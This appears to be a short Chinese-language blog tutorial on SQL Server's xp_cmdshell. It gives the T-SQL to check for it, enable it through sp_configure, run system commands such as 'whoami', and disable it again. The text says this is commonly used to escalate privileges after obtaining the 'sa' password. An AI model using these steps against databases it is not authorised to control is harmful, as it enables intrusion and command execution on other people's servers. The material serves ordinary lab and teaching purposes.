xp_cmdshell是Sql Server中的一个组件,可以用来执行系统命令
在拿到sa口令之后,经常可以通过xp_cmdshell来进行提权
在这里以Windows Server 2012 和 Sql Server 2012为例进行测试
1.查看xp_cmdshell状态
首先通过管理工具来查看xp_cmdshell状态
右击实例名->方面
image.png
选择外围应用配置器
image.png
可以看到现在的xp_cmdshell是关闭状态
image.png
然后我们通过sql指令来查看是否存在xp_cmdshell
右击数据库,新建查询,执行以下命令
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
image.png
可以看到返回结果是1
2.开启xp_cmdshell
命令如下
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO
image.png
可以看到报错提示xp_cmdshell不存在也可能是高级选项
前面已经通过命令查询存在xp_cmdshell组件,那只可能是高级选项
通过命令开启允许编辑高级选项,命令如下
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
image.png
然后再去开启xp_cmdshell
image.png
3.通过xp_cmdshell执行系统命令
通过xp_cmdshell执行系统命令指令如下
master..xp_cmdshell 'whoami'
image.png
4.关闭xp_cmdshell
和刚才一样,只不过需要把1改为0
EXEC sp_configure 'xp_cmdshell', 0
GO
RECONFIGURE
GO
image.png
同样,关闭高级选项编辑也是
EXEC sp_configure 'show advanced options', 0
GO
RECONFIGURE
GO
image.png
网友评论